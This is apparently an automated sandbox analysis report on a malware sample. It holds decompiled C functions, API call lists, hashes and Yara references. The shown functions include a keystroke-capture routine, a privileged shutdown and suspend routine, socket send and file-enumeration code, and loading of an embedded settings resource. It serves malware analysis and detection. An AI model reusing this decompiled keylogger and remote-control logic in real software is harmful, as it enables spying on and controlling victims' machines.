						return _t133;
					} else {
						FindClose(_t273);
						_t206 = _t186 + 4;
					}
					L10:
					L00404DD5(_t206);
					goto L37;
				}
				 *(_t279 - 4) =  *(_t279 - 4) | 0xffffffff;
				FindClose(_t273);
				_t267 =  *(_t279 - 0x18);
				L00402F73(_t186, _t284 - 0x18, L00402F97(_t279 - 0x54, _t279 + 0x38, 0x46c238), __eflags, _t279 + 0x50);
				_push(0x67);
				E00404A6E(_t186, _t267 + 4, _t124, __eflags);
				L00401FA7();
				_t206 = _t267 + 4;
				goto L10;
			}

0x004077ee
0x004077ee
0x004077f3
0x004077f8
0x00407801
0x00407804
0x00407806
0x0040780f
0x00407814
0x00407818
0x0040781b
0x0040781f
0x00407824
0x00407829
0x00407833
0x00407834
0x00407835
0x00407836
0x00407839
0x0040783e
0x00407840
0x00407bf2
0x00407bf4
0x00000000
0x00407846
0x00407846
0x00407864
0x0040786a
0x00407876
0x0040787c
0x00407881
0x00407883
0x0040788b
0x00407890
0x00407897
0x0040789c
0x0040789f
0x0040789f
0x004078a0
0x004078a0
0x004078a0
0x00407883
0x004078b1
0x004078ba
0x004078d6
0x004078db
0x004078ea
0x00407904
0x00407906
0x0040790c
0x00407911
0x00407914
0x00000000
0x00407916
0x00407916
0x00407920
0x00407925
0x0040792d
0x00407935
0x0040793a
0x00407941
0x00407946
0x00000000
0x00407946
0x0040794e
0x0040794e
0x00407956
0x0040795c
0x0040795e
0x00000000
0x00000000
0x00407964
0x00407967
0x0040796a
0x00407980
0x00407987
0x00407a8e
0x00407a9b
0x00407aaf
0x00407ac0
0x00407ada
0x00407adf
0x00407af3
0x00407af6
0x00407b93
0x00407b99
0x00407b9e
0x00000000
0x00407afc
0x00407b17
0x00407b1f
0x00407b24
0x00407b4e
0x00407b52
0x00407b58
0x00407b5d
0x00407b62
0x00407b65
0x00407b6b
0x00407b76
0x00407b7b
0x00407b7d
0x00000000
0x00407b7f
0x00407b7f
0x00407b86
0x00407b8b
0x00000000
0x00407b8b
0x00407b7d
0x0040798d
0x0040798d
0x00407992
0x00407998
0x00407998
0x0040799b
0x0040799e
0x00000000
0x00000000
0x004079a0
0x004079a3
0x004079ba
0x004079ba
0x004079a5
0x004079a5
0x004079a9
0x004079a9
0x004079ad
0x00000000
0x004079af
0x004079af
0x004079b2
0x004079b5
0x004079b8
0x00000000
0x00000000
0x00000000
0x00000000
0x004079b8
0x004079ad
0x004079c3
0x004079c3
0x004079c5
0x00000000
0x004079cb
0x004079cb
0x004079d0
0x004079d6
0x004079d6
0x004079d9
0x004079dc
0x00000000
0x00000000
0x004079de
0x004079e1
0x004079f8
0x004079f8
0x004079e3
0x004079e3
0x004079e7
0x004079e7
0x004079eb
0x00000000
0x004079ed
0x004079ed
0x004079f0
0x004079f3
0x004079f6
0x00000000
0x00000000
0x00000000
0x00000000
0x004079f6
0x004079eb
0x00407a01
0x00407a01
0x00407a03
0x00000000
0x00407a09
0x00407a2d
0x00407a32
0x00407a3e
0x00407a46
0x00407a4b
0x00407a54
0x00407a59
0x00407a62
0x00407a69
0x00407a6e
0x00407a70
0x00407a89
0x00000000
0x00407a72
0x00407a72
0x00407a79
0x00407a7e
0x00000000
0x00407a7e
0x00407a70
0x00000000
0x00407a03
0x004079fc
0x004079fe
0x004079fe
0x00000000
0x004079fe
0x00000000
0x004079c5
0x004079be
0x004079c0
0x004079c0
0x00000000
0x004079c0
0x00407c19
0x00407c1f
0x00407c27
0x00407c2f
0x00407c37
0x00407c3f
0x00407c47
0x00407c54
0x0040796c
0x0040796d
0x00407973
0x00407973
0x00407976
0x00407976
0x00000000
0x00407976
0x00407ba6
0x00407bab
0x00407bb1
0x00407bd2
0x00407bd8
0x00407bdd
0x00407be5
0x00407bea
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004077F3

Part of subcall function 004049D2: connect.WS2_32(?,?,00000010), ref: 004049ED

Part of subcall function 00404A6E: send.WS2_32 ref: 00404AE2

__CxxThrowException@8.LIBVCRUNTIME ref: 004078A0
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FE
FindNextFileW.KERNEL32(00000000,?), ref: 00407956
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796D

Part of subcall function 00404DD5: closesocket.WS2_32(?), ref: 00404DDB

FindClose.KERNEL32(00000000), ref: 00407BAB

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
String ID:
API String ID: 2104358809-0
Opcode ID: c6c59b665eafe7319c9b2a087d526e89f25a9c2d45839bc85ac3f7b827e2010f
Instruction ID: 500d6ffaf10c8ca55e64fcd7a92a986a0ae94d1cc1e451eb4534f92e48179c39
Opcode Fuzzy Hash: c6c59b665eafe7319c9b2a087d526e89f25a9c2d45839bc85ac3f7b827e2010f
Instruction Fuzzy Hash: 78C16E719001099ADB14FB61CD52AEE7375AF10318F50427FE906B71E2EF38AB48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004089BC, Relevance: 9.1, APIs: 6, Instructions: 54
keyboardthreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004089BC(void* __ecx, intOrPtr _a4) {
				long _v8;
				void _v38;
				short _v40;
				char _v296;
				void* __ebx;
				void* __edi;
				struct HKL__* _t20;
				void* _t30;
				signed int _t32;
				void* _t36;

				_t30 = __ecx;
				E00431810(_t36,  &_v296, 0, 0x100);
				_v40 = 0;
				_t32 = 7;
				memset( &_v38, 0, _t32 << 2);
				asm("stosw");
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
				GetKeyState(0x10);
				GetKeyboardState( &_v296);
				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
				E0040425F(_t30, _a4,  &_v40);
				return _a4;
			}

0x004089d3
0x004089d8
0x004089e5
0x004089eb
0x004089ec
0x004089ee
0x00408a02
0x00408a0c
0x00408a19
0x00408a35
0x00408a42
0x00408a50

APIs

GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089F0
GetWindowThreadProcessId.USER32(00000000,?), ref: 004089FB
GetKeyboardLayout.USER32(00000000), ref: 00408A02
GetKeyState.USER32 ref: 00408A0C
GetKeyboardState.USER32(?), ref: 00408A19
ToUnicodeEx.USER32 ref: 00408A35

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: ce9fbcb1af16b219518ae451de87e86953cc4498fe46d4c49b47f750d426bd73
Instruction ID: ab76f315eabbce1fdb121dfd98bae8f760d40ea8c637dec96147df679fa50a93
Opcode Fuzzy Hash: ce9fbcb1af16b219518ae451de87e86953cc4498fe46d4c49b47f750d426bd73
Instruction Fuzzy Hash: 6B110072900208BBDB109FE4DD49FDA77ACEB4C746F100465FA04E6191EA75AA54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00412598, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97
libraryloadershutdownCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00412598(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
				void* _t12;
				int _t14;
				int _t20;
				int _t22;
				int _t31;
				intOrPtr* _t64;
				void* _t69;

				_t69 = __eflags;
				E004132F7();
				L00401E29( &_a16, __edx, _t69, 0);
				_t12 = E00405A22("0");
				_push(0);
				_t70 = _t12;
				if(_t12 == 0) {
					L00401E29( &_a12, "0", __eflags);
					_t14 = E00405A22("1");
					_push(0);
					__eflags = _t14;
					if(__eflags == 0) {
						L00401E29( &_a12, "1", __eflags);
						__eflags = E00405A22("2");
						if(__eflags == 0) {
							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
							L00401E29( &_a16, "2", __eflags, 0);
							_t62 = "3";
							_t20 = E00405A22("3");
							_push(0);
							__eflags = _t20;
							if(__eflags == 0) {
								L00401E29( &_a16, "3", __eflags);
								_t62 = "4";
								_t22 = E00405A22("4");
								__eflags = _t22;
								if(_t22 != 0) {
									_push(0);
									_push(0);
									_push(1);
									goto L11;
								}
							} else {
								_push(0);
								_push(0);
								L11:
								 *_t64();
							}
						} else {
							_push(0);
							_t31 = E00436079(_t28, L00401F75(L00401E29( &_a16, "2", __eflags, 1))) | 0x00000002;
							__eflags = _t31;
							goto L6;
						}
					} else {
						_t31 = E00436079(_t33, L00401F75(L00401E29( &_a12, "1", __eflags, 1))) | 0x00000001;
						goto L6;
					}
				} else {
					_t31 = E00436079(_t36, L00401F75(L00401E29( &_a12, "0", _t70, 1)));
					L6:
					ExitWindowsEx(_t31, ??);
				}
				L00401E54( &_a16, _t62);
				L00401FA7();
				L00401FA7();
				return 0;
			}

0x00412598
0x00412598
0x004125a4
0x004125b0
0x004125b9
0x004125ba
0x004125bc
0x004125d4
0x004125e0
0x004125e9
0x004125ea
0x004125ec
0x00412607
0x00412618
0x0041261a
0x00412661
0x00412663
0x00412668
0x0041266f
0x00412674
0x00412675
0x00412677
0x00412681
0x00412686
0x0041268d
0x00412692
0x00412694
0x0041269a
0x0041269b
0x0041269c
0x00000000
0x0041269c
0x00412679
0x00412679
0x0041267a
0x0041269e
0x0041269e
0x0041269e
0x0041261c
0x0041261c
0x00412635
0x00412635
0x00000000
0x00412635
0x004125ee
0x00412602
0x00000000
0x00412602
0x004125be
0x004125cd
0x00412638
0x0041263a
0x0041263a
0x00412d65
0x00412d71
0x00412d7d
0x00412d8a

APIs

Part of subcall function 004132F7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00413304
Part of subcall function 004132F7: OpenProcessToken.ADVAPI32(00000000), ref: 0041330B
Part of subcall function 004132F7: LookupPrivilegeValueA.ADVAPI32 ref: 0041331D
Part of subcall function 004132F7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041333C
Part of subcall function 004132F7: GetLastError.KERNEL32 ref: 00413342

ExitWindowsEx.USER32 ref: 0041263A
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041264F
GetProcAddress.KERNEL32(00000000), ref: 00412656

Strings

SetSuspendState, xrefs: 00412645
PowrProf.dll, xrefs: 0041264A

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: ea38b14ec89c96fb48715dd59a133ab21833c25730c251835e3ef89065bcec9d
Instruction ID: e6245df6452118ac941c9a456e50b357b4a0d59a13aba4ba33676c8a529c691a
Opcode Fuzzy Hash: ea38b14ec89c96fb48715dd59a133ab21833c25730c251835e3ef89065bcec9d
Instruction Fuzzy Hash: 6621487160430166CA04FBB6E967AEF22599F5030DF40583FB442A71E3EE7C8D59865E

Uniqueness

Uniqueness Score: -1.00%

Function 0044926C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0044926C(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x459f98;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x459fa0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0043604F(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x00449271
0x00449272
0x00449279
0x0044931d
0x0044932b
0x00449336
0x0044933c
0x00449341
0x00449343
0x00449343
0x00449349
0x0044934e
0x0044934e
0x00449338
0x00449338
0x00000000
0x00449338
0x0044927f
0x00449284
0x00000000
0x00000000
0x0044928a
0x0044928f
0x00449291
0x00449291
0x00449297
0x00000000
0x00000000
0x0044929c
0x004492b3
0x004492b3
0x004492bc
0x004492be
0x00000000
0x00000000
0x004492c0
0x004492c5
0x004492c7
0x004492c7
0x004492cd
0x00000000
0x00000000
0x004492d2
0x004492f0
0x004492f2
0x00449315
0x00000000
0x0044931a
0x00449302
0x0044930d
0x00000000
0x00000000
0x0044930f
0x00000000
0x0044930f
0x004492d4
0x004492dc
0x00000000
0x00000000
0x004492de
0x004492e1
0x004492e7
0x00000000
0x00000000
0x00000000
0x004492e9
0x004492eb
0x004492ed
0x00000000
0x004492ed
0x0044929e
0x004492a6
0x00000000
0x00000000
0x004492a8
0x004492ab
0x004492b1
0x00000000
0x00000000
0x00000000
0x004492b1
0x004492b7
0x004492b9
0x00000000

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 00449305
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 0044932E
GetACP.KERNEL32(?,?,0044958B,?,00000000), ref: 00449343

Strings

OCP, xrefs: 004492C0
ACP, xrefs: 0044928A

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
Instruction ID: 570c54974e689fd34d1e6bcab7248841df2efce4c8a6e9186f0595708dde5153
Opcode Fuzzy Hash: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
Instruction Fuzzy Hash: C1212822600101BBFB30CF64C802A9773A6FF59F55B568866ED09D7341E776DD01E398

Uniqueness

Uniqueness Score: -1.00%

Function 0040D41E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D41E(void** __ecx) {
				void* _t3;
				long _t4;
				void** _t5;
				struct HRSRC__* _t7;

				_t5 = __ecx;
				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t3 = LockResource(LoadResource(0, _t7));
				_t4 = SizeofResource(0, _t7);
				 *_t5 = _t3;
				return _t4;
			}

0x0040d42a
0x0040d432
0x0040d43e
0x0040d449
0x0040d450
0x0040d454

APIs

FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040D42C
LoadResource.KERNEL32(00000000,00000000,?,?,?,0040CFD9), ref: 0040D437
LockResource.KERNEL32(00000000,?,?,?,0040CFD9), ref: 0040D43E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040CFD9), ref: 0040D449

Strings

SETTINGS, xrefs: 0040D423

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: c908c3803409cf7171344093e449dd1e134e4aad92bc91585c3c664446313f73
Instruction ID: 24a513b8d2ab5e094724d90079fe90a958381d8b28c7bf08dd7741c770137eef
Opcode Fuzzy Hash: c908c3803409cf7171344093e449dd1e134e4aad92bc91585c3c664446313f73
Instruction Fuzzy Hash: A3E0EC72740350BBD6201BA16C5DF4B6A68DB85FA3F000465F601CA1D5CAB5C9008B65

Uniqueness

Uniqueness Score: -1.00%

Function 00449440, Relevance: 7.7, APIs: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00449440(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x46a00c; // 0x44c884ad
				_v8 = _t39 ^ _t109;
				_t89 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00440972(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00440972(_t89, __ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x459f94; // 0x17
					E004493E3(0, 0x459e80, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					L00448D80(_t92, _t99,  &_v20);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						L00448E66(_t92, _t99,  &_v20);
					} else {
						L00448DCB(_t92, _t99,  &_v20);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x459e7c; // 0x41
						_t77 = E004493E3(_t99, 0x459b70, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E0044926C(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E004412C5(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E0042F61B(_v8 ^ _t109);
								}
								_t33 =  &(_t89[0x90]); // 0x43d072
								E004412C5(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t36 =  &(_t89[0x40]); // 0x43cfd2
								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								_t38 =  &(_t89[0x80]); // 0x43d052
								E0043A76D(_t38, _t108, _t38, 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							L00448E66(_t92, _t99,  &_v20);
						} else {
							L00448DCB(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

0x00449448
0x0044944f
0x00449456
0x0044945a
0x0044945e
0x0044946c
0x00449471
0x00449472
0x00449473
0x00449474
0x0044947c
0x0044947e
0x00449484
0x0044948a
0x0044948d
0x0044948f
0x00449492
0x00449496
0x0044949d
0x004494aa
0x004494af
0x004494b2
0x004494b5
0x004494b5
0x004494b7
0x004494ba
0x004494be
0x0044952e
0x00449530
0x00449532
0x00449545
0x00449545
0x0044954c
0x00449552
0x00449555
0x00000000
0x00449555
0x00449534
0x00449537
0x00000000
0x00000000
0x0044953d
0x00449542
0x00000000
0x004494c5
0x004494c5
0x004494c9
0x004494df
0x004494d0
0x004494d4
0x004494d4
0x004494e8
0x004494e9
0x00449573
0x00449573
0x00000000
0x004494ef
0x004494ef
0x004494fe
0x00449503
0x00449508
0x00449558
0x00449558
0x00449558
0x0044955a
0x0044955e
0x00449575
0x00449581
0x0044958b
0x0044958e
0x0044958f
0x00449591
0x00000000
0x00000000
0x00449593
0x00449599
0x00000000
0x00000000
0x0044959b
0x004495a1
0x00000000
0x00000000
0x004495a7
0x004495ad
0x004495af
0x00000000
0x00000000
0x004495b6
0x004495bc
0x004495be
0x00000000
0x00000000
0x004495c0
0x004495c3
0x004495c5
0x004495c7
0x004495c7
0x004495d8
0x004495dd
0x004495df
0x0044963f
0x00449562
0x00449572
0x00449572
0x004495e4
0x004495ee
0x004495fe
0x00449604
0x00449606
0x00000000
0x00000000
0x0044960e
0x0044961d
0x00449623
0x00449625
0x00000000
0x00000000
0x0044962f
0x00449637
0x00000000
0x0044963c
0x00449560
0x00000000
0x00449560
0x0044950a
0x0044950c
0x00449510
0x00449526
0x00449517
0x0044951b
0x0044951b
0x0044952b
0x00000000
0x0044952b
0x004494e9

APIs

Part of subcall function 00440972: GetLastError.KERNEL32(?,?,00434E55,?,?,?,00435444,0043609C,?,0046C238), ref: 00440976
Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,0046C238,?,?,?,?,?,?,?,?,?,0043609C,00000000,00412AA2,00000000), ref: 004409EA
Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0

Part of subcall function 00440972: _free.LIBCMT ref: 004409D1
Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,0046C238,?,?,?,?,?,?,?,?,?,0043609C,00000000,00412AA2,00000000), ref: 004409DE

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044954C
IsValidCodePage.KERNEL32(00000000), ref: 004495A7
IsValidLocale.KERNEL32(?,00000001), ref: 004495B6
GetLocaleInfoW.KERNEL32(?,00001001,0043CF52,00000040,?,0043D072,00000055,00000000,?,?,00000055,00000000), ref: 004495FE
GetLocaleInfoW.KERNEL32(?,00001002,0043CFD2,00000040), ref: 0044961D

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 4f29291a398986d9b346dab9a49201bc34959112b7168d17cffe74ad61a86425
Instruction ID: 8a1905ba9bd6499ab3f410366c50d1caeed45d39038b25d0bae0cc1b30d53ac2
Opcode Fuzzy Hash: 4f29291a398986d9b346dab9a49201bc34959112b7168d17cffe74ad61a86425
Instruction Fuzzy Hash: 67517172A00209ABFF11DFA5DC41ABF73B8AF04701F14046AE915E7291E778DE01DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00441069, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043C9B0,?,00000004), ref: 004410BC

Strings

@, xrefs: 004410A7
GetLocaleInfoEx, xrefs: 00441084

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx$@
API String ID: 2299586839-3007343520
Opcode ID: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
Instruction ID: a7f704755b5d2e67fe8756e3b063992e3f12ebeeb1607a3b83353fcb2a10ec15
Opcode Fuzzy Hash: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
Instruction Fuzzy Hash: ADF02B31700208FBDB116F61DC02F6F7B60EF44B01F50412AFC05272A2DB798D649A9E

Uniqueness

Uniqueness Score: -1.00%

Function 004360A3, Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E004360A3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x46a00c; // 0x44c884ad
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0042F21A(_t41);
					_pop(_t62);
				}
				E00431810(_t67,  &_v804, 0, 0x50);
				E00431810(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
